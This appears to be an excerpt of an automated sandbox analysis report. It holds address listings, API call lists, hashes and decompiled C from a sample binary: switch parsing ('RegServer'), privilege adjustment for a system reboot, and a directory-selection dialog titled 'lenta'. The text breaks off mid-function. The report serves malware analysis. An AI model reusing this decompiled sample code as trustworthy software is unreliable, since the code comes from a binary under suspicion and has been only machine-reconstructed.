                                                                                                                                                                                                                                                0x00025d64
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d62
                                                                                                                                                                                                                                                0x00025d5b
                                                                                                                                                                                                                                                0x00025d4f
                                                                                                                                                                                                                                                0x00025d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d9f
                                                                                                                                                                                                                                                0x00025d9f
                                                                                                                                                                                                                                                0x00025da5
                                                                                                                                                                                                                                                0x00025dab
                                                                                                                                                                                                                                                0x00025dba
                                                                                                                                                                                                                                                0x00026218
                                                                                                                                                                                                                                                0x0002621d
                                                                                                                                                                                                                                                0x00026220
                                                                                                                                                                                                                                                0x00026221
                                                                                                                                                                                                                                                0x00026229
                                                                                                                                                                                                                                                0x00026230
                                                                                                                                                                                                                                                0x00026247
                                                                                                                                                                                                                                                0x0002626a
                                                                                                                                                                                                                                                0x00026272
                                                                                                                                                                                                                                                0x00026249
                                                                                                                                                                                                                                                0x00026255
                                                                                                                                                                                                                                                0x0002625f
                                                                                                                                                                                                                                                0x00026264
                                                                                                                                                                                                                                                0x00026264
                                                                                                                                                                                                                                                0x00026284
                                                                                                                                                                                                                                                0x00025dc0
                                                                                                                                                                                                                                                0x00025dc0
                                                                                                                                                                                                                                                0x00025dca
                                                                                                                                                                                                                                                0x00025e22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025dcc
                                                                                                                                                                                                                                                0x00025dce
                                                                                                                                                                                                                                                0x00025e24
                                                                                                                                                                                                                                                0x00025e24
                                                                                                                                                                                                                                                0x00025e2c
                                                                                                                                                                                                                                                0x00025e47
                                                                                                                                                                                                                                                0x00025e4a
                                                                                                                                                                                                                                                0x000261d2
                                                                                                                                                                                                                                                0x000261e2
                                                                                                                                                                                                                                                0x000261e7
                                                                                                                                                                                                                                                0x000261ee
                                                                                                                                                                                                                                                0x000261f1
                                                                                                                                                                                                                                                0x000261f1
                                                                                                                                                                                                                                                0x000261f8
                                                                                                                                                                                                                                                0x000261f8
                                                                                                                                                                                                                                                0x00025e50
                                                                                                                                                                                                                                                0x00025e53
                                                                                                                                                                                                                                                0x00026109
                                                                                                                                                                                                                                                0x0002611f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026125
                                                                                                                                                                                                                                                0x00026137
                                                                                                                                                                                                                                                0x0002613a
                                                                                                                                                                                                                                                0x0002613c
                                                                                                                                                                                                                                                0x0002613e
                                                                                                                                                                                                                                                0x0002613e
                                                                                                                                                                                                                                                0x00026141
                                                                                                                                                                                                                                                0x00026141
                                                                                                                                                                                                                                                0x00026143
                                                                                                                                                                                                                                                0x00026144
                                                                                                                                                                                                                                                0x0002614a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026150
                                                                                                                                                                                                                                                0x00026152
                                                                                                                                                                                                                                                0x0002615c
                                                                                                                                                                                                                                                0x00026170
                                                                                                                                                                                                                                                0x00026172
                                                                                                                                                                                                                                                0x0002617c
                                                                                                                                                                                                                                                0x00026190
                                                                                                                                                                                                                                                0x00026190
                                                                                                                                                                                                                                                0x00026196
                                                                                                                                                                                                                                                0x000261a5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000261ab
                                                                                                                                                                                                                                                0x000261b9
                                                                                                                                                                                                                                                0x000261c6
                                                                                                                                                                                                                                                0x000261c6
                                                                                                                                                                                                                                                0x0002617e
                                                                                                                                                                                                                                                0x00026180
                                                                                                                                                                                                                                                0x0002618a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002618a
                                                                                                                                                                                                                                                0x0002615e
                                                                                                                                                                                                                                                0x00026160
                                                                                                                                                                                                                                                0x0002616a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002616a
                                                                                                                                                                                                                                                0x0002615c
                                                                                                                                                                                                                                                0x0002614a
                                                                                                                                                                                                                                                0x0002610b
                                                                                                                                                                                                                                                0x0002610e
                                                                                                                                                                                                                                                0x0002610e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025e59
                                                                                                                                                                                                                                                0x00025e59
                                                                                                                                                                                                                                                0x00025e5c
                                                                                                                                                                                                                                                0x0002604f
                                                                                                                                                                                                                                                0x00026056
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002605c
                                                                                                                                                                                                                                                0x0002606e
                                                                                                                                                                                                                                                0x00026071
                                                                                                                                                                                                                                                0x00026073
                                                                                                                                                                                                                                                0x00026075
                                                                                                                                                                                                                                                0x00026075
                                                                                                                                                                                                                                                0x00026078
                                                                                                                                                                                                                                                0x00026078
                                                                                                                                                                                                                                                0x0002607a
                                                                                                                                                                                                                                                0x0002607b
                                                                                                                                                                                                                                                0x00026081
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026087
                                                                                                                                                                                                                                                0x00026087
                                                                                                                                                                                                                                                0x0002608d
                                                                                                                                                                                                                                                0x0002609c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000260a2
                                                                                                                                                                                                                                                0x000260aa
                                                                                                                                                                                                                                                0x000260b2
                                                                                                                                                                                                                                                0x000260b7
                                                                                                                                                                                                                                                0x000260bd
                                                                                                                                                                                                                                                0x000260bf
                                                                                                                                                                                                                                                0x000260bf
                                                                                                                                                                                                                                                0x000260d6
                                                                                                                                                                                                                                                0x000260e0
                                                                                                                                                                                                                                                0x000260e7
                                                                                                                                                                                                                                                0x000260f5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000260f5
                                                                                                                                                                                                                                                0x0002609c
                                                                                                                                                                                                                                                0x00026081
                                                                                                                                                                                                                                                0x00025e62
                                                                                                                                                                                                                                                0x00025e62
                                                                                                                                                                                                                                                0x00025e65
                                                                                                                                                                                                                                                0x00025fd3
                                                                                                                                                                                                                                                0x00025fe9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025fef
                                                                                                                                                                                                                                                0x00025fef
                                                                                                                                                                                                                                                0x00025ff7
                                                                                                                                                                                                                                                0x00025ffd
                                                                                                                                                                                                                                                0x00026003
                                                                                                                                                                                                                                                0x00026006
                                                                                                                                                                                                                                                0x00026011
                                                                                                                                                                                                                                                0x00026014
                                                                                                                                                                                                                                                0x0002603d
                                                                                                                                                                                                                                                0x00026016
                                                                                                                                                                                                                                                0x00026018
                                                                                                                                                                                                                                                0x00026019
                                                                                                                                                                                                                                                0x0002601b
                                                                                                                                                                                                                                                0x00026033
                                                                                                                                                                                                                                                0x0002601d
                                                                                                                                                                                                                                                0x00026020
                                                                                                                                                                                                                                                0x00026029
                                                                                                                                                                                                                                                0x00026022
                                                                                                                                                                                                                                                0x00026022
                                                                                                                                                                                                                                                0x00026022
                                                                                                                                                                                                                                                0x00026020
                                                                                                                                                                                                                                                0x0002601b
                                                                                                                                                                                                                                                0x00026042
                                                                                                                                                                                                                                                0x00026044
                                                                                                                                                                                                                                                0x00026046
                                                                                                                                                                                                                                                0x0002604a
                                                                                                                                                                                                                                                0x00025ff7
                                                                                                                                                                                                                                                0x00025fd5
                                                                                                                                                                                                                                                0x00025fd8
                                                                                                                                                                                                                                                0x00025fd8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025e6b
                                                                                                                                                                                                                                                0x00025e6b
                                                                                                                                                                                                                                                0x00025e6e
                                                                                                                                                                                                                                                0x00025f8b
                                                                                                                                                                                                                                                0x00025f99
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025f9f
                                                                                                                                                                                                                                                0x00025fa7
                                                                                                                                                                                                                                                0x00025faf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025fb1
                                                                                                                                                                                                                                                0x00025fb3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025fb5
                                                                                                                                                                                                                                                0x00025fb7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025fb9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025fb9
                                                                                                                                                                                                                                                0x00025fb7
                                                                                                                                                                                                                                                0x00025fb3
                                                                                                                                                                                                                                                0x00025faf
                                                                                                                                                                                                                                                0x00025f8d
                                                                                                                                                                                                                                                0x00025f8d
                                                                                                                                                                                                                                                0x00025f8d
                                                                                                                                                                                                                                                0x00025f8f
                                                                                                                                                                                                                                                0x00025fc1
                                                                                                                                                                                                                                                0x00025fc1
                                                                                                                                                                                                                                                0x00025fc1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025e74
                                                                                                                                                                                                                                                0x00025e74
                                                                                                                                                                                                                                                0x00025e77
                                                                                                                                                                                                                                                0x00025ea0
                                                                                                                                                                                                                                                0x00025ebd
                                                                                                                                                                                                                                                0x00025f79
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025f7f
                                                                                                                                                                                                                                                0x00025ec3
                                                                                                                                                                                                                                                0x00025ec3
                                                                                                                                                                                                                                                0x00025ecc
                                                                                                                                                                                                                                                0x00025ed4
                                                                                                                                                                                                                                                0x00025ed6
                                                                                                                                                                                                                                                0x00025edc
                                                                                                                                                                                                                                                0x00025edf
                                                                                                                                                                                                                                                0x00025eea
                                                                                                                                                                                                                                                0x00025eed
                                                                                                                                                                                                                                                0x00025f3f
                                                                                                                                                                                                                                                0x00025f40
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025eef
                                                                                                                                                                                                                                                0x00025eef
                                                                                                                                                                                                                                                0x00025ef2
                                                                                                                                                                                                                                                0x00025f34
                                                                                                                                                                                                                                                0x00025ef4
                                                                                                                                                                                                                                                0x00025ef4
                                                                                                                                                                                                                                                0x00025ef7
                                                                                                                                                                                                                                                0x00025f2b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025ef9
                                                                                                                                                                                                                                                0x00025ef9
                                                                                                                                                                                                                                                0x00025efc
                                                                                                                                                                                                                                                0x00025f22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025efe
                                                                                                                                                                                                                                                0x00025eff
                                                                                                                                                                                                                                                0x00025f02
                                                                                                                                                                                                                                                0x00025f16
                                                                                                                                                                                                                                                0x00025f04
                                                                                                                                                                                                                                                0x00025f07
                                                                                                                                                                                                                                                0x00025f0d
                                                                                                                                                                                                                                                0x00025f46
                                                                                                                                                                                                                                                0x00025f46
                                                                                                                                                                                                                                                0x00025f09
                                                                                                                                                                                                                                                0x00025f09
                                                                                                                                                                                                                                                0x00025f09
                                                                                                                                                                                                                                                0x00025f07
                                                                                                                                                                                                                                                0x00025f02
                                                                                                                                                                                                                                                0x00025efc
                                                                                                                                                                                                                                                0x00025ef7
                                                                                                                                                                                                                                                0x00025ef2
                                                                                                                                                                                                                                                0x00025f4c
                                                                                                                                                                                                                                                0x00025f4e
                                                                                                                                                                                                                                                0x00025f50
                                                                                                                                                                                                                                                0x00025f54
                                                                                                                                                                                                                                                0x00025ed4
                                                                                                                                                                                                                                                0x00025ea2
                                                                                                                                                                                                                                                0x00025ea4
                                                                                                                                                                                                                                                0x00025eaf
                                                                                                                                                                                                                                                0x00025eaf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025e79
                                                                                                                                                                                                                                                0x00025e7d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025e83
                                                                                                                                                                                                                                                0x00025e83
                                                                                                                                                                                                                                                0x00025e83
                                                                                                                                                                                                                                                0x00025e85
                                                                                                                                                                                                                                                0x00025e85
                                                                                                                                                                                                                                                0x00025e8e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025e94
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025e94
                                                                                                                                                                                                                                                0x00025e8e
                                                                                                                                                                                                                                                0x00025e7d
                                                                                                                                                                                                                                                0x00025e77
                                                                                                                                                                                                                                                0x00025e6e
                                                                                                                                                                                                                                                0x00025e65
                                                                                                                                                                                                                                                0x00025e5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025dd0
                                                                                                                                                                                                                                                0x00025dd0
                                                                                                                                                                                                                                                0x00025dd0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025dd0
                                                                                                                                                                                                                                                0x00025dce
                                                                                                                                                                                                                                                0x00025dca
                                                                                                                                                                                                                                                0x00025dba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d00
                                                                                                                                                                                                                                                0x00025dd9
                                                                                                                                                                                                                                                0x00025e04
                                                                                                                                                                                                                                                0x000261fe
                                                                                                                                                                                                                                                0x00025e0a
                                                                                                                                                                                                                                                0x00025e0c
                                                                                                                                                                                                                                                0x00025e17
                                                                                                                                                                                                                                                0x00025e17
                                                                                                                                                                                                                                                0x00025e04
                                                                                                                                                                                                                                                0x00026200
                                                                                                                                                                                                                                                0x00026200
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharNextA.USER32(?,00000000,?,?), ref: 00025CEE
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00028B3E,00000104,00000000,?,?), ref: 00025DFC
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00025E3E
                                                                                                                                                                                                                                                • CharUpperA.USER32(-00000052), ref: 00025EE1
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00025F6F
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00025FA7
                                                                                                                                                                                                                                                • CharUpperA.USER32(-0000004E), ref: 00026008
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 000260AA
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00021140,00000000,00000040,00000000), ref: 000261F1
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 000261F8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                                • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                                • Opcode ID: 1ece995c77dd352938fa4f715fa2b2cc83c3fbdc5375919e1728c0ca47b5e9bb
                                                                                                                                                                                                                                                • Instruction ID: b5790fbfb057b068c95780ec36cd00b0fc9faaf16e833828389be4cddceae9ee
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ece995c77dd352938fa4f715fa2b2cc83c3fbdc5375919e1728c0ca47b5e9bb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06D17071A04E745FEFB58B38BC4C3FA77E19B16306F2440EAC486C6191DA758E878B49
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00021F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 60%
                                                                                                                                                                                                                                                			E00021F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x29a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x28004; // 0xf4950d3e
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E000244B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00026CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E000244B9(0, 0x522, 0x21140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00021EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

















                                                                                                                                                                                                                                                0x00021f90
                                                                                                                                                                                                                                                0x00021f90
                                                                                                                                                                                                                                                0x00021f93
                                                                                                                                                                                                                                                0x00021f98
                                                                                                                                                                                                                                                0x00021fa4
                                                                                                                                                                                                                                                0x00021fa7
                                                                                                                                                                                                                                                0x00021fc5
                                                                                                                                                                                                                                                0x00021fcd
                                                                                                                                                                                                                                                0x00021fdb
                                                                                                                                                                                                                                                0x00021ee5
                                                                                                                                                                                                                                                0x00021eea
                                                                                                                                                                                                                                                0x00021ef1
                                                                                                                                                                                                                                                0x00021ef4
                                                                                                                                                                                                                                                0x00021f0c
                                                                                                                                                                                                                                                0x00021f2e
                                                                                                                                                                                                                                                0x00021f3a
                                                                                                                                                                                                                                                0x00021f46
                                                                                                                                                                                                                                                0x00021f4d
                                                                                                                                                                                                                                                0x00021f58
                                                                                                                                                                                                                                                0x00021f60
                                                                                                                                                                                                                                                0x00021f61
                                                                                                                                                                                                                                                0x00021f62
                                                                                                                                                                                                                                                0x00021f75
                                                                                                                                                                                                                                                0x00021f80
                                                                                                                                                                                                                                                0x00021f77
                                                                                                                                                                                                                                                0x00021f77
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021f77
                                                                                                                                                                                                                                                0x00021f64
                                                                                                                                                                                                                                                0x00021f64
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021f64
                                                                                                                                                                                                                                                0x00021f0e
                                                                                                                                                                                                                                                0x00021f0e
                                                                                                                                                                                                                                                0x00021f13
                                                                                                                                                                                                                                                0x00021f13
                                                                                                                                                                                                                                                0x00021f14
                                                                                                                                                                                                                                                0x00021f14
                                                                                                                                                                                                                                                0x00021f16
                                                                                                                                                                                                                                                0x00021f17
                                                                                                                                                                                                                                                0x00021f1a
                                                                                                                                                                                                                                                0x00021f1f
                                                                                                                                                                                                                                                0x00021f1f
                                                                                                                                                                                                                                                0x00021f86
                                                                                                                                                                                                                                                0x00021f8f
                                                                                                                                                                                                                                                0x00021fcf
                                                                                                                                                                                                                                                0x00021fd3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021fd3
                                                                                                                                                                                                                                                0x00021fa9
                                                                                                                                                                                                                                                0x00021fb4
                                                                                                                                                                                                                                                0x00021fbb
                                                                                                                                                                                                                                                0x00021fc3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021fc3
                                                                                                                                                                                                                                                0x00021f9a
                                                                                                                                                                                                                                                0x00021f9a
                                                                                                                                                                                                                                                0x00021fa2
                                                                                                                                                                                                                                                0x00021fd9
                                                                                                                                                                                                                                                0x00021fda
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021fa2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00021EFB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00021F02
                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00021FD3
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                                • Opcode ID: 74657fe935480b152b0e099ba7798e7ee3fff2b760d59a327819dc4e5d0b3921
                                                                                                                                                                                                                                                • Instruction ID: 066d0d44d37b6bb8b1b694d34160a2f68be1989e9836a707e50dbe15f604bea2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74657fe935480b152b0e099ba7798e7ee3fff2b760d59a327819dc4e5d0b3921
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC21A971B402157BEB705BA1BD4AFFF76F8EB95B10F200029FA16D6181DB7988029661
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00026CF0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00026CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                                                                                                                                                                                                                                0x00026cf7
                                                                                                                                                                                                                                                0x00026d00
                                                                                                                                                                                                                                                0x00026d19

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00026E26,00021000), ref: 00026CF7
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(00026E26,?,00026E26,00021000), ref: 00026D00
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00026E26,00021000), ref: 00026D0B
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00026E26,00021000), ref: 00026D12
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3231755760-0
                                                                                                                                                                                                                                                • Opcode ID: b13f452a60df67c71d6b5cd50f57dc804a006e52916854b18daa185c018df3bf
                                                                                                                                                                                                                                                • Instruction ID: 04b1bb948f83a3fb8cd808168b80c1460327d8f35ffa679abc332f163c510404
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b13f452a60df67c71d6b5cd50f57dc804a006e52916854b18daa185c018df3bf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14D0C932200108BBFB202BE1EC0CA597F28EB4A232F644000F31982020CF3A44628B52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00023210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                			E00023210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E000243D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lenta");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x29a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x291e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E000244B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x291e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x291e5 - 3;
						if(_t49 - 0x291e5 < 3) {
							goto L32;
						}
						_t24 =  *0x291e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x291e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0002658A(0x291e4, 0x104, 0x21140);
								_t27 = E000258C8(0x291e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x291e4 - 0x5c;
									if( *0x291e4 != 0x5c) {
										L30:
										_t30 = E0002597D(0x291e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x291e5 - 0x5c;
									if( *0x291e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E000244B9(_t64, 0x54a, 0x291e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x291e4, 0);
							__eflags = _t33;
